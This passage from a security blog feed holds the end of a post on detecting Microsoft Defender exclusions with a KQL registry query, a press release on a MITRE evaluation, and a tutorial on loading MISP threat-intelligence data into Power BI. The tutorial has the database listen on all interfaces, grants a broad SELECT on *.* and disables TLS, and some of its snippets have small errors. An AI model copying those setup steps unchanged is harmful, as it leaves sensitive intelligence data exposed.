| where RegistryKey has "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions"
| where RegistryValueName !in (exclusions)

A custom detection rule can be created based on the DeviceId, and rule properties, such as response actions, can be specified to help investigation and remediation activities.

Conclusion

As we have seen during this blog post, it is currently not possible to block administrators from adding exclusions in Microsoft Defender for Endpoint. If local administrators are required on devices, detection mechanisms can be implemented to make sure your security operations teams have visibility on such events.

About the author

Guillaume is a Senior Security Consultant in the Cloud Security Team. His main focus is on Microsoft Azure and Microsoft 365 security where he has gained extensive knowledge during many engagements, from designing and implementing Azure AD Conditional Access policies to deploying Microsoft 365 Defender security products. Additionally, Guillaume has recently gained interest into DevSecOps and has obtained the GIAC Cloud Security Automation (GCSA) certification.

You can find Guillaume on LinkedIn.

NVISO EXCELS IN MITRE ATT&CK® MANAGED SERVICES EVALUATION

9 November 2022 at 14:13

As one of the only EU-based Cyber Security companies, NVISO successfully participated in a first-of-its-kind, MITRE-led, evaluation of Managed Security Services (MSS).

MITRE Evaluation Graphic


The inaugural MITRE Engenuity ATT&CK® Evaluations for Managed Security Services ran in June 2022 and its results have been published today. NVISO performed excellently in the evaluation, demonstrating services that are at or above the level of traditional titans of the industry.


During this evaluation, NVISO was tested on its ability to detect and report advanced attacks that were executed by the MITRE team.

“The tests were simulating real-life scenarios in which only detection and reporting was evaluated – we were not allowed to block or respond to any attacks”, says Erik Van Buggenhout, Partner, responsible for Managed Security Services at NVISO. A test environment was set up in which participants would deploy their tools and detection services.

“NVISO chose to deploy Palo Alto’s Cortex XDR – an XDR tool that integrates seamlessly into our service and client environments. The combination of XDR with our NITRO automation platform and NVISO world-class expertise ensures that our Managed Detection and Response service is top notch and future-proof. While we have always believed in our own strategy, we are excited and proud to receive MITRE’s external and independent validation of the outstanding quality of our services.”, Erik says.

NVISO was one of the only EU-based Cyber Security companies participating in this elite evaluation. “NVISO is a true European Cyber Security company, which is reflected well in its mission: to safeguard the foundations of European society from cyber attacks”, says Maxim Deweerdt, head of MSS presales at NVISO.

NVISO was founded in 2013 in Belgium, has since offered services to large and mid-sized customers in almost 20 countries, mostly in Europe. NVISO has offices in Brussels, Frankfurt, Munich, Vienna and Athens. “The way NVISO approaches Managed Detection and Response is typical for our company: we challenge the status-quo and provide an innovative approach driven by our expertise and long experience in cyber defense”, Maxim says, “This evaluation has highlighted and validated our approach, and confirms the positive feedback we receive from customers”.


More information about the evaluation and NVISO’s services can be found here: https://mitre.nviso.eu

About MITRE

MITRE Engenuity is a US nonprofit organization launched in 2019 “to collaborate with the private sector on solving industry-wide problems with cyber defense” in collaboration with corporate partners. They are most known in the Cyber Security world for their work on the ATT&CK® framework, which is a global knowledge base of threat activity, techniques and models. ATT&CK® framework is used by almost every vendor and provider in the Cyber Defense industry.

www.mitre-engenuity.org

About NVISO

NVISO is a pure-play Cyber Security company founded in 2013 in Brussels by 5 ex-Big four managers. They always had an itch to do things differently (and better), decided to start their own company and with a strong mission: to safeguard the foundations of European society from cyber attacks. NVISO currently employs about 200 people and has offices in Brussels, Frankfurt, Munich, Vienna and Athens. NVISO is rapidly expanding into other countries and has an aggressive growth strategy for the next years. NVISO has customers in 20+ countries, primarily the Finance, Government, Defense, and Technology sectors.

www.nviso.eu



Visualizing MISP Threat Intelligence in Power BI – An NVISO TI Tutorial

9 November 2022 at 13:42
MISP Power BI Dashboard

Problem Statement

Picture this. You are standing up your shiny new MISP instance to start to fulfill some of the primary intelligence requirements that you gathered via interviews with various stakeholders around the company. You get to some requirements that are looking for information to be captured in a visualization, preferably in an automated and constantly updating dashboard that the stakeholder can look into at their leisure.

Well MISP was not really made for that. There is the MISP-Dashboard repo but that is not quite what we need. Since we want to share the information and combine it with other data sources and make custom visualizations we need something more flexible and linked to other services and applications the organization uses. Also it looks as if other stakeholders would like to compare and contrast their datasets with that of the TI program. Then you think, it would be nice to be able to display all the work that we put into populating the MISP instance and show value over time. How the heck are we going to solve all of these problems with one solution which doesn’t cost a fortune???

Links to review:

CTIS-2022 Conference talk – MISP to PowerBI: https://youtu.be/0i7_gn1DfJU
MISP-Dashboard powered by ZMQ: https://github.com/MISP/misp-dashboard

Proposed Solution

Enter this idea = “Making your data (and yourself/your team) look amazing with Power BI!”

In this blog we will explain how to use the functionality of Power BI to accomplish all of these requirements. Along the way you will probably come up with other ideas around data analytics that go beyond just the TI data in your MISP instance. Having all this data in a platform that allows you to slice and dice it without messing with the original source is truly game changing.

What is MISP???

If you do not know what MISP is, I prepped this small section.

MISP is a Threat Intelligence Sharing Platform that is now community driven. You can read more about its history here: https://www.misp-project.org/

In a nutshell, MISP is a platform that allows you to capture, generate, and share threat intelligence in a structured way. It also helps control access to the data that the user and organization is supposed to be able to access. It uses MariaDB as its back-end database. MariaDB is a fork of MySQL. This makes it a prime candidate for using Power BI to analyze the data.

What is Power BI???

Power BI is a set of products and services offered by Microsoft to enable users to centralize Business Intelligence (BI) data with all the tools to analyze and visualize it. Other applications and services that are similar to Power BI are Tableau, MicroStrategy, etc.

Power BI Desktop

  • Desktop application
  • Complete data analysis solution
  • Includes Power Query Editor (ETLs)
  • Can upload data and reports to the Power BI service
  • Can share reports and templates manually with other Power BI Desktop users
  • Free (as in beer), runs on modern Windows systems

Power BI Service

  • Cloud solution
  • Can link visuals in reports to dashboards (scheduled data syncs)
  • Used for collaboration and sharing
  • Limited data modelling capabilities
  • Not Free (Pro license level included with Microsoft E5 license, per individual licenses available as well)

Links to Pricing

More information here: https://docs.microsoft.com/en-gb/power-bi/fundamentals/power-bi-overview and https://powerbi.microsoft.com/en-au/pricing/

Making the MISP MariaDB accessible to Power BI Desktop

MISP uses MariaDB which is a fork of MySQL. These terms are used interchangeably during this blog. You can use MariaDB or MySQL on the command line. I will use MySQL in this blog for conciseness.

Adding a Power BI user to MariaDB

When creating your MISP instance, you create a root user for the MariaDB service. Log in with that user to create a new user that can read the MISP database.

mysql -u root -p
# List users
SELECT User, Host FROM mysql.user;
# Create new user
CREATE USER 'powerbi'@'%' IDENTIFIED BY '<insert_strong_password';
GRANT SELECT on *.* to 'powerbi'@'';
FLUSH PRIVILEGES;
# List users again to verify
SELECT User, Host FROM mysql.user;
# Close mysql terminal
exit

Configuring MariaDB to Listen on External Interface

We need to make the database service accessible outside of the MISP instance. By default it listens only on 127.0.0.1

sudo netstat -tunlp
# You should see that mysqld is listening on 127.0.0.1:3306

# Running the command below is helpful if you do not know what locations are being read for configuration information by mysql
mysql --help | grep "Default options" -A 1

# Open the MariaDB config file below as it is the one that is being used by default in normal MISP installs.
sudo vim /etc/mysql/mariadb.conf.d/50-server.cnf

# I will not go into how to use vim as you can use the text editor of your choice. (There are strong feelings here....)
# Add the following lines in the [mysqld] section:

skip-networking=0
skip-bind-address

# Comment out the bind-address line with a # 
#bind-address

# Should look like this when you are done: #bind-address            = 127.0.0.1
# Then save the file

# Restart the MariaDB service
sudo service mysql restart

# List all the listening services again to validate our changes. 
sudo netstat -tunlp
# You should see the mysqld service now listening on 0.0.0.0:3306

Optional: Setup Firewall Rules to Control Access (recommended)

To maintain security we can add host-based firewall rules to ensure only our selected IPs or network ranges are allowed to connect to this service. If you are in a local environment, behind a VPN, etc., then this step might not be necessary. Below is a quick command to enable UFW on Ubuntu and allow all the ports needed for MISP, MySQL, and for maintenance via SSH.

# Switch to root for simplicity
sudo su -

# Show current status
ufw status

# Set default rules
ufw default deny incoming
ufw default allow outgoing

# Add your trusted network range or specific IPs for the ports below. If there are additional services you need to allow connections to you can add them in the same manner. Example would be SNMP. Also if you are using an alternate port for SSH, make sure you update that below or you will be cut off from your server. 
ufw allow from 10.0.0.0/8 to any port 22,80,443,3306 proto tcp

# Show new rules listed by number
ufw status numbered

# Start the firewall
ufw enable

For more information on UFW, I suggest the Digital Ocean tutorials.

You can find a good one here: https://www.digitalocean.com/community/tutorials/how-to-set-up-a-firewall-with-ufw-on-ubuntu-20-04

Testing Access from Remote System with MySQL Workbench

Having a tool to test and work with MySQL databases is crucial for testing in my opinion. I use the official “MySQL Workbench” that can be found at the link below:
https://dev.mysql.com/downloads/workbench/

You can follow the documentation here on how to use the tool and create a connection: https://dev.mysql.com/doc/workbench/en/wb-mysql-connections-new.html

Newer versions of the Workbench try to enforce connections to databases over SSL/TLS for security reasons. By default, the database connection in use by MISP does not have encryption configured. It is also out of the scope of this article to set this up. To get around this, you can add useSSL=0 to the “Others” text box in the Advanced tab of the connection entry for your MISP server. When you test the connection, you will receive a pop-up warning about incompatibility. Proceed and you should have a successful test.

MySql Workbench Settings

Once the test is complete, close the create connection dialog. You can then click on the connection block in Workbench and you should be shown a screen similar to the one below. If so, congratulations! You have setup your MISP instance database to be queried remotely.

MySQL Workbench Data Example

Installing Power BI Desktop and MySQL Drivers

Oracle MySQL Connector

For Power BI Desktop to connect to the MySQL server you will need to install a “connector” which tells Power BI how to communicate with the database. Information on this process is found here: https://docs.microsoft.com/en-us/power-query/connectors/mysqldatabase
The “connector” itself can be downloaded from here: https://dev.mysql.com/downloads/connector/net/

You will have to create a free Oracle account to be able to download the software.

Test Access from Power BI Desktop to MISP MariaDB

Once installed, you will be able to select MySQL from the “Get data” button in the ribbon in the Data section of the Home tab. (Or the splash screen that pops up each time you load Power BI Desktop, hate that thing. I swear I have unchecked the “Show this screen on startup” but it doesn’t care. I digress.)

Do not get distracted by the amount of datatypes you can connect to Power BI. This is where the nerd rabbit hole begins. FOCUS!

  1. Click on Get data
  2. Click on More…
  3. Wait for it to load
  4. Type “MySQL” in the search box
  5. Select MySQL database from the panel to the right
  6. Click Connect
Selecting Data Type
  1. Setup IP address and port in the Server field for your MISP instance
  2. Type misp in the Database field
  3. Click OK
Configure MISP Connection Information
  1. Select Database for the credential type
  2. Enter the user we created and the password
  3. Select the database level in the “Select which level to apply these settings to” drop-down menu
  4. Click Connect
Connecting to the MISP MariaDB Service

View your data in all its glory!

If you get an error such as “An error happened while reading data from the provider: ‘Character set ‘utf8mb3’ is not supported by .Net Framework.”, do not worry. Just install the latest version of the .NET Framework and the latest MySQL Connector for .NET. This should fix any issues you are having.

You can close the window; Power BI will remember and store the connection information for next time.

If you cannot authenticate or connect, recheck your username and password and confirm that you can reach the MISP server on port 3306 from the device that you are running Power BI Desktop on. Also, make sure you are using Database for the authentication type and not Windows Auth.

Create a save file so that we can start working on our data ingest transforms and manage the relationships between the various tables in the MISP schema.

  1. Select File
  2. Save As
  3. Select the location where you will save the local copy of your Power BI report.
  4. Click Save

Now, we have a blank report file and pre-configured data source. Awesomeness!

Power Query Transforms (ETL Process)

ETL: extract, transform, load. Look it up. Big money in the data analytics space by the way.

So, let’s get into looking at the data and making sure it is in the right format for our purposes. If you closed Power BI Desktop, open it back up. Once loaded, click on file and then Open report. Select the report you saved earlier. So, we have a nice and empty workspace. Let’s fix that!

In the Ribbon, click on Recent sources and select the source we created earlier. You should be presented with Navigator and a list of tables under the misp schema.

Selecting Tables in Power BI Desktop

Let all the tables we want to use load for visualizations later. In my experience, it helps to do this all at once instead of trying to add additional tables at a later date.

Select the tables in the next subsection, Recommended Tables, and click Load. This could take a while if your MISP instance has a lot of Events and Attributes in it. It will create a local copy of the database so that you can create your reports accurately. Then you can refresh this local copy when needed. We will talk about data refresh later as well.

Do not try to transform the data at this step, especially if you MISP instance has a lot of data in it. We will do the transforms in a later step.

Data Importing Into Power BI Desktop

Recommended Tables

  • misp.attribute_tags
  • misp.attributes
  • misp.event_blocklists
  • misp.event_tags
  • misp.events
  • misp.galaxies
  • misp.galaxy_clusters
  • misp.galaxy_elements
  • misp.object_references
  • misp.objects
  • misp.org_blocklists
  • misp.organisations
  • misp.over_correlating_values
  • misp.sightings
  • misp.tags
  • misp.warninglist_entries
  • misp.warninglists

As you will see in the table selection dialog box, there are a lot of tables to choose from and we need most of them so that we can do drill downs, filters, etc. Do be careful if you decide to pull in tables like misp.users, misp.auth_keys, or misp.rest_client_histories, etc. These tables can contain sensitive data such as API keys and hashed passwords.

Column Data Types and Transforming Timestamps

Now, let’s start cleaning the data up for our purposes.

We are going to use a Power Query for this. To open Power Query Editor, look in the Ribbon for the Transform data button in the Queries section.

Transform Data Button

Click this and it will open the Power Query Editor window.

We will start with the first table in Queries list on the left, misp attribute_tags. There are not many columns in this table but it will help us go over some terminology.

Power Query

As shown in the screenshot above, Power BI has done some classification of data types in the initial ingest. We have four numeric columns and one boolean column. All of this looks to be correct and usable in this state. Let’s move on to a table that needs some work.

The very next table, misp attributes, needs some work. There are a lot more rows and columns in this table. In fact, this is probably the biggest table in MISP bar the correlations table. One reason we did not import that one.

At first glance, nothing seems to be amiss; that is until we scroll to the right and see the timestamp column.

Power Query Epoch Timestamp

If you recognize this long number, tip of the hat to you. If not, this is a UNIX timestamp also known as an epoch timestamp. It is the duration of time since the UNIX epoch which is January 1st, 1970 at 00:00:00 UTC. While this works fine in programs such as PHP that powers MISP; projects such as Power BI need human-readable timestamp formats AND SO DO WE! So let’s make that happen.

What we are going to do is a one-step transform. This will remove the epoch timestamp column and replace it with a human-readable timestamp column that we can understand and so can the visualization filters of Power BI. This will give you the ability to filter by month, year, quarter, etc.

Power BI uses a languages called DAX and Power Query M. Will be mainly be using Power Query M for this transformation work. You use DAX for data analysis, calculations, etc.

https://docs.microsoft.com/en-us/dax/dax-overview
https://docs.microsoft.com/en-us/powerquery-m/m-spec-introduction

Using Power Query M we are going to transform the timestamp column by calculating the duration since the epoch. So let’s to this with the timestamp column of the misp attributes table.

To shortcut some of the code creation we are going to use a built in Transform called Extract Text After Delimiter. Select the Transform tab from the ribbon and then select Extract in the Text Column section of the ribbon. In the drop-down menu select Text After Delimiter. Enter any character in the Delimiter text field. I am going to use “1”. This will create the following code in the formula bar:

= Table.TransformColumns(#"Extract Text After Delimiter", {{"timestamp", each Text.AfterDelimiter(Text.From(_, "en-US"), "1"), type text}})
Formula Example

We are going to alter this command to get the result we want. Starting at the “(” sign, replace everything with:

misp_attributes, {{"timestamp", each #datetime(1970,1,1,0,0,0) +#duration(0,0,0,_), type datetime}})

Your formula bar should look like this:

= Table.TransformColumns(misp_attributes, {{"timestamp", each #datetime(1970,1,1,0,0,0) +#duration(0,0,0,_), type datetime}})

And your column should have changed to a datetime type, little calendar/clock icon, and should be displaying a human readable values like in the screenshot below.

Timestamp Transformed

Do this with every epoch timestamp column you come across for all the tables. Make sure the epoch timestamp is already of type = numeric. If it is text you can use this code block to change it to numeric in the same step. Or add a type change step, then perform the transform as above.

# Change <table_name> to the name of the table you are working on.
= Table.TransformColumns(<table_name>, {{"timestamp", each #datetime(1970,1,1,0,0,0) +#duration(0,0,0,Number.From(_)), type datetime}})

If there are empty, 0, or null cells in your column then you can use the Power Query M (code/macro) command below and alter it as needed. Example of this would be the sighting_timestamp column or the first_seen and last_seen columns:

# Change <table_name> to the name of the table you are working on.
= Table.TransformColumns(<table_name>, {{"first_seen", each if _ = null then null else if _ = 0 then 0 else #datetime(1970,1,1,0,0,0) +#duration(0,0,0,_), type datetime}})

If there are empty, 0, or null cells in your column then you can use the Power Query M (code/macro) command below and alter it as needed. Example of this would be the sighting_timestamp column or the first_seen and last_seen columns:

# Change <table_name> to the name of the table you are working on.
= Table.TransformColumns(<table_name>, {{"first_seen", each if _ = null then null else if _ = 0 then 0 else #datetime(1970,1,1,0,0,0) +#duration(0,0,0,_), type datetime}})

Using the last code block above that handles null and 0 values is probably the best bet overall so that you do not have errors when you encounter a cell that should have a timestamp but does not.

It is recommend to remove the first_seen and last_seen columns on the Attribute table as well. They are rarely used and cause more issues and errors than value. This is done in Power Query by right clicking on the column name and selecting “Remove”

Also remember to SAVE as you work. In the top left you will see the classic Save icon. This will trigger a pop-up saying that you have transforms that need to be applied. Approve this as you will have to before it saves. This will apply your new transforms to the dataset. With the attributes table, this may take a minute. Grab a coffee, we will wait…

Move on to the next table and so on. There is a lot of work up front with this ETL workflow. But the work is usually minimal to up keep after the initial cleanup. Only additional fields or changes to the source data would be a reason to go back to these steps after they are complete. Enter the whole change control discussion and proper release notes on products and ….. OKAY moving on.

There maybe an error in a field or two but usually it is okay. It will save any errors in a folder within Power Query Editor that you can review as needed.

Loading Tables With Transforms

Other Transforms

While you are doing the timestamp corrections on your tables, you may notice that there are other fields that could benefit from some alteration to make it easier to group, filter, etc. I will discuss some of them here but of course you may find others, this is not an exhaustive list by any means.

Splitting Tags

So now that we have gone through each table and fixed all the the timestamps, we can move on to other columns that might need adjustments. Our example will be the “misp tags” table. Navigate to the Power Query Editor again and select the this table.

MISP Tags ETL

Look at the name column in the misp.tags table. From personal experience, there may come a time when you only want to display or filter on just the value of the tag and not the full tag name. We will split this string into its parts and also keep the original. Then we can do what we want with it.

Select the “name” column then in the Ribbon click the Add Column tab. Then click Extract, Text Between Delimiters. For the delimiter use a colon “:”. This will create a new column on the far right. Here is the formula that was auto-generated and creates the new column:

= Table.AddColumn(misp_tags, "Text After Delimiter", each Text.AfterDelimiter([name], ":"), type text)

We will add an if statement to deal with tags that are just standalone words. But we do not want to break the TLP or PAP tags, so we add that as well. You will have to play with this as needed as tags can change and new ones are added all the time. You can just add more else if checks to the instruction below. Changing the name of the column is easy as replacing the string “Inserted Text After Delimiter” with whatever you want. I chose “Short_Tag_Name”. Comparer.OrdinalIgnoreCase tells Power Query M to use a case-insensitive comparer.

= Table.AddColumn(misp_tags, "Short_Tag_Name", each if Text.Contains([name], "tlp:", Comparer.OrdinalIgnoreCase) then [name] else if Text.Contains([name], "pap:", Comparer.OrdinalIgnoreCase) then [name] else if Text.Contains([name], ":") then Text.AfterDelimiter([name], ":") else [name])

Here is what you should have now. Yay!

MISP Tags Split ETL Results

Relationship Mapping

Why Auto Mapping in Power BI Doesn’t Work

Power BI tries to help you by finding commonalities in the tables you load and automatically building relationships between them. Then is usually not correct, especially when the data is from an application and not purpose built for reporting. We can tell Power BI to stop helping.

Let’s stop the madness.
Go to File, Options and settings, Options
Uncheck all the boxes in the “Relationships” section

Disable Auto Mapping

Once this is complete, click on the Manage relationships button under the Modeling tab of the Ribbon. Delete any relationships you see there.

Managing Relationships

Once your panel looks like the one above, click New…
We can create the relationship using this selection panel…

Create a Relationship

We can also use the graphical method. You can get to the graph by closing the Create and Manage relationship windows and clicking on the Model icon on the left of the Power BI workspace.

Managing Relationships Graphically
Relationship Map

Here we can drag and drop connectors between tables. Depending on your style, you may like one method over the other. I prefer the drag and drop method. To each their own.

Process to Map Tables

To map the relationships of these tables, you need to know a little about MISP and how it works.

  • Events in MISP can have tags, objects, attributes, galaxies (basically groups of tags), and must be created by an organization.
  • Attributes can have tags and sightings.
  • Objects are made up of Attributes
  • Warninglists are not directly related but can match against Attributes
  • Events and Organizations can be blocked by being placed on a corresponding blocklist
  • There is a table called over_correlating_values that tracks attributes that are very common between many events.

Using this information and user knowledge of MISP, you can map what relates to the other. Mainly, mostly tables have an “id” column that is the key of that table. For instance the tags table column “id” is related to the “tag_id” of the event_tags table. To make this easier you can rename the “id” column of the tags table to “tag_id” so that it matches. You will have to go through this process with all the tables. There will be relationships that are not “active”. This is due to multiple relationship per table were create ambiguity in the model. Ambiguity meaning uncertainty. Which relationship would the software choose. It does not like this. So for the models sake you have to pick which one is active by default if there is a conflict. You can use DAX when making visualizations to temporally activate an inactive relationship if you need to. Great post on this here: https://www.vivran.in/post/understanding-ambiguity-in-power-bi-data-model

Personally, relationship mapping was the most tedious part for me. But once it is done you should not have to change it again.

Examples of a Relationship Map

Here is what the relationship model should look like when you are done. Now we can start building visualizations!

Example of a Complete Relationship Map

I will leave the rest of the relationship mapping as a exercise for you. It will help you better understand how MISP uses all this data as well.

Later we will talk about Power BI templates and the one we are providing to the community.

Making your first visualization

What do you want to visualize

At this stage you have to start looking at your Primary Intelligence Requirements (PIR). Why are you doing this work? What is the question you are answering and who is asking the question?

For example, if your CISO is asking for a constantly updating dashboard of key metrics around the CTI Program then your requirement is just that. You can fulfill this requirement with Power BI Desktop and Power BI Service. So as a first step we need to create some visualizations that will provide insights into the operational status of the CTI program.

Count all the things

To start off easy, we will just make some charts that count the number of Events and Attributes that are currently in our MISP instance during a certain time window.
To do this we will go back to Power BI Desktop and the Report workspace.

Starting to Create a Visualization

So let’s start with Events and display them in a bar chart over time. Expand the misp events table in the Fields panel on the left. Select the event_id and check the box. This will place that field in the X-axis, drag it down to the Y-axis. This will change it to a count. Then select the Date field in the Events table. This will create the bar chart in the screenshot below. You will have to resize it by dragging the corner of the chart as you would with any other window.

Histogram Example

We need to filter down on the year the Event was created. Drag Year in the Date field hierarchy over to the Filter on all pages panel. Then change the filter type to basic. Then select the last 5 years to get a small dataset. This will be different depending on the amount and age of your MISP dataset.

Filtering Visuals

Nice. Now there is a thing that Power BI does that will be annoying. If you want to look at data over a long period of time it will, by default, group all of the data by that views bucket no matter if it has another higher order bucket. That probably makes no sense. But for example, if you are looking at data over two years and then want to see how many events per month, it will combine the data for the two years and then show you that total for the months Jan-Dec. It also concatenates the labels by default. See below, this is five years of data but it is only show the sum of all events that happened in each month over those five years.

Time Buckets Not Correct

To change this you can click on the forked arrow to the left of the double arrow highlighted in the screenshot above. This will split the hierarchy. You will have to drill up to the highest level of the hierarchy first using the single up arrow. Click this until you are at years only. We can also turn off label concatenation. See the highlighted areas in the screenshot below. Now this is more like it!

Time Buckets Correctly Configured

Using a Slicer as a time filter

Now we need to be able to change the date range that we are viewing easier to change. Let’s add a Slicer for that! Drag the Slicer visualization to the canvas. You can let it live on top of the visualization or reorganize. Not drag the Date field of the event table into the new visualization. You should be left with a slider that can now filter the main visualization. Awesome. See the example below.

Slicer Example

You can also change the way the Slicer looks or operates with the options menu in the top right. See below.

Different Types of Slicers

Ask questions about your data

Let’s add some additional functionality to our report. Click on the three dots, … , in the visualization selection panel. Then click Get More Visuals, then select or search for and select Text Filter by Microsoft. Add it to your environment. Then add it and the Q&A visualizations to your canvas. To use the Text Filter you need to give it fields to search in. Add the value1 field from the attributes table. This is the main field in the attributes table that stores your indicator of compromise or IoC for short.

Text Filter

After you rearrange some stuff to make everything fit, ask the following question in your Q&A visual, “How many attribute_id are there?”. Give it a minute and you should get back a count of the number of attributes in the dataset. Nice!

Now do a Text Search in that visual for an IP you know is in your MISP instance. I know we have the infamous 8.8.8.8 in ours, IDS flag set to false of course :). Now the text search will filter the Q&A answer and it should show you how many times that value is seen in your dataset. It also filters your bar chart to show you when the events were created that contain that data! If your bar chart doesn’t change, check you relationship maps. It might be the filtering direction. Play with this until your data behaves the way you need it to. Imagine the capabilities of this if you get creative! You can also mess with the built in design templates to make this sexier or you can manually change backgrounds, borders, etc

Example Visuals

Add in Geo-location data

Before we start: Sign up for a free account here: https://www.ip2location.io/

Record your API address, we will use this soon.

Lets also create a new transform that will add geoip data to the IP addresses in our attributes table.

We are going to start by creating a new table with just IP attributes.

Click on Transform data in the Ribbon. Then right click on the misp attributes table.

Duplicate the table and then right click on the new table and select rename. I renamed mine “misp ip_addresses_last_30_days_geo”.

Now we are going to do some filtering to shrink this table to the last 30 days worth of IP attributes. If we did not do this we my burn through our API credits due to the amount of IPs in our MISP instance. Of course you can change the date range as needed for your use case.

Right click the column type and filter to just ip-src and ip-dst.

Selecting Attribute Types to Filter Column

Then filter to the last 30 days. Right click the timestamp column and open Date/Time Filters > In the Previous…

Filter Tables by Time

In the dialog box, enter you time frame. I entered last 30 days as below.

Filtering to the Last 30 Days

Then we are going to follow the instructions that can be found at the following blog: https://www.fourmoo.com/2017/03/14/power-bi-query-editor-getting-ip-address-details-from-ip-address/

In that blog you create a custom function like the one below. Follow the instructions in that blog, it is a great read.

fn_GetIPAddressDetails

let
Source = (#"IP Address" as text) => let
Source = Json.Document(Web.Contents("https://api.ip2location.io/?ip=" & #"IP Address" & "&key=<ip2location_api_key>")),
#"Converted to Table" = Record.ToTable(Source),
#"Transposed Table" = Table.Transpose(#"Converted to Table"),
#"Promoted Headers" = Table.PromoteHeaders(#"Transposed Table")
in
#"Promoted Headers"
in
Source

Once you have this function saved you can use it to create a new set up columns in your new IP Address table, the one a name “misp ip_addresses_last_30_days_geo” earlier. Use the column value1 for the argument of the function.

Example of GeoIP locations and Text Filter on Tag Name

Sharing with the community

On the NIVSO CTI Github page, you will find a Power BI template file that has all the Power BI related steps above for you. All you have to do is change the data source to your MISP and get an API key for https://www.ip2location.io/.

Download the template file located here: https://github.com/NVISOsecurity/nviso-cti/tree/master/Power_BI

Use the import function under the File menu in the Power BI Desktop ribbon.

Import Function

Import the template. There will be errors as you have not specified your data source. Cancel the login dialog box and close the Refresh dialog box. It will show the IP of my dev MISP, you will need to specify your data source. Select Transform Data in the ribbon and then Data source settings. Here you can edit the source information and add your credentials. (Make sure you have configured your MISP instance for remote MySQL access and installed the MySQL .NET connector)

Close Prompt to Update Creds
Change Data Source
Accessing Source Settings
Change MySQL Source
Adding Your Creds 1

Make sure you set the encryption checkbox as needed.

Adding Your Creds 2

Select Transform Data in the ribbon again and then Transform data to open the Power Query editor.

Accessing Power Query to Edit Custom Function

Then select the custom function for geoip and use the Advanced Editor to add your API key.

Add Your API Key

Now, if you data source settings/credentials are correct you can Close and Apply and it should start pulling in the data from your configured MISP instance.

Conclusion

Note of caution with all this, check your source data to make sure what your seeing in Power BI matches what you see in MISP. As my brother-in-law and data analytics expert, Joshua Henderson, says: “Always validate that what your outcome in Power BI/Tableau is correct for what you have in the DB. I will either already know what the outcome should be in my viz tool, or I will do it after I create my viz. Far too often I see data counts off and it can be as small as a mis-click on a filter, or as bad as your mapping being off and you are dropping a large percentage of say attribute_ids. It also can help you with identifying issues; either with your database not updating correctly, or an issue with your data refresh settings.”

Now that you have built you first visualization, I will leave it to you to build more and would love to see what you come up with. In the next blog I will demonstrate how to publish this data to the Power BI Service and use the Data Gateway to automate dataset refresh jobs! Once published to the Power BI Service you will be able to share your reports and create and share dashboard built from individual visual in your reports. Even view all this on your phone!!

I also leave you with this idea. Now that your MISP data is in Power BI, what other data can you pull into Power BI to pair with this data? SIEM data? Data from your XDR/EDR? Data from your SOC’s case management solution? Data from your vulnerability management platform? You get the idea!

Until next time!

Thanks for reading!!!
Robert Nixon
@syloktools

Rock On!